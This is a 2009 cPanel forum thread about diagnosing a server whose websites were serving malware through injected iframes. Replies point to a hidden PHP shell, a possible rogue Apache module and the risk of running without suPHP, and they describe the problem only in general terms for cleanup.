The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

IFrame Hack - Cpanel Forced Update = Fixed?

Discussion in 'Security' started by contemptx, Oct 18, 2009.

  1. contemptx

    contemptx Registered

    Joined:
    Aug 8, 2007
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    Ok,

    Long story short..ish

    So up until this morning my server & websites were running fine,
    however woke up today to see that my sites looked like they were currupted, well the forums anyway,

    So looking through the FTP, all files seemed intact,

    I looked through my non forum sites and noticed they were serving out malware via an embeded IFrame.

    However checking the FTP all files were intact & not altered.

    I decided I would go through and start securing the server to see if I could find the rootkit or whatever was causing the issues so first off I done a:

    Forced Cpanel Update

    Once this had completed my websites were fine?

    I had to run out after that, a few hours later and my sites were again hacked.

    Another Cpanel Update later & my sites were ok again?

    After hours of searching I came accross many threads saying that this hack is caused via hackers gaining access to FTP accounts.

    However, i dont use easy passwords 20+ letters, numbers, symbols
    reading further it was said that they also gain them by infecting the source PC and store them when you connect to the site for maintance etc..

    But after a virus / malware scan = nothing, (I also have these running 24/7 due to certain data i deal)

    So anyway, I have updated all passwords, disabled all shell access on accounts.

    But i still dont get as to how this hack is happening, when files are not being edited and that its currently solved by forcing cpanel to update?

    I haved checked just about everything & I cannot find anything out of place?
     
  2. mtindor

    mtindor Well-Known Member

    Joined:
    Sep 14, 2004
    Messages:
    1,281
    Likes Received:
    37
    Trophy Points:
    48
    Location:
    inside a catfish
    cPanel Access Level:
    Root Administrator
    Perhaps your Apache is loading a module that is automatically injecting the code into served webpages... and perhaps the module isn't loaded immediately after an Apache restart (which happens after a Cpanel update).

    Restart your Apache and see if the problem instantly "goes away." If it does, then it's likely an Apache module is being loaded at some point. It may stay dormant for a period of time to make you think that everything is alright.

    m
     
  3. S-Combs

    S-Combs Well-Known Member

    Joined:
    Jun 10, 2004
    Messages:
    78
    Likes Received:
    0
    Trophy Points:
    6
    Here is some additional information regarding that iframe exploit if you haven't seen this already.
    http://en.wikipedia.org/wiki/Gumblar

    We have had a couple clients in the past who have been effected by this and both swore to have shown clean by their personal anti-virus systems. In each of these cases however; We did find PHP shells within their file structure. So, regardless of how the problem originated and the fact that all passwords were changed, the hackers were able to return through these shells until they were found and removed.

    You might try multiple scans on your own workstation using different software as well as, using cpanels anti-virus scan on your server however that scan most likely will not locate shells which have been encoded.

    I have used this free script (attached) to help locate shells within accounts. You can adjust the search patterns to help locate various encoding methods within a file structure.

    Good luck
     

    Attached Files:

  4. contemptx

    contemptx Registered

    Joined:
    Aug 8, 2007
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    S-Combs,

    Thank you so much,

    Within minutes of running that script it found the encoded shell script hiding inside one of my domains.

    I have zero clue how it got there, it was uploaded about a week ago, into a files directory.

    However I have again changed passwords & updated just about everything that can be updated to hopefully keep the intruder out.

    The only thing im still confused about is how Updating Cpanel, fixed the issue of the sites loading the Iframe code?
     
  5. mtindor

    mtindor Well-Known Member

    Joined:
    Sep 14, 2004
    Messages:
    1,281
    Likes Received:
    37
    Trophy Points:
    48
    Location:
    inside a catfish
    cPanel Access Level:
    Root Administrator
    If you only found one shell script in one domain but all of your sites get nailed with the iframe injection after a period of time, then you have to think in a larger scope.

    Are you running suPHP? I suspect not. If you aren't running suPHP, your apache is running as "nobody" for all users. So, if one users' site gets hacked, the perpetrator can easily use a handy PHP script or CGI to go through all sites on the server (and in other places on the server) and modify files.

    In the case of a non-suPHP environment, it would be very easy for one malicious script in one users' directory to be used to affect sites serverwide.

    If you are running suPHP, and if you are saying that your server is still experiencing the problem of iframe injections across all domains, then you've got some sort of suspicious module loaded somewhere that is doing it.

    So..

    Are you running suPHP?
    Are you still experiencing the problem of iframe injections across all domains?

    The mere fact that all of your sites were experiencing the iframe injection phenomenon and the fact that your "updating Cpanel" was temporarily fixing the problem leads me to suspect you've got a problem with an apache module [or a kernel module?] injecting iframes automatically. If this is the case, your probably didnt go away with the removal of the one script and you've got more at risk than a single site.

    Mike
     
    #5 mtindor, Oct 19, 2009
    Last edited: Oct 19, 2009
Loading...

Share This Page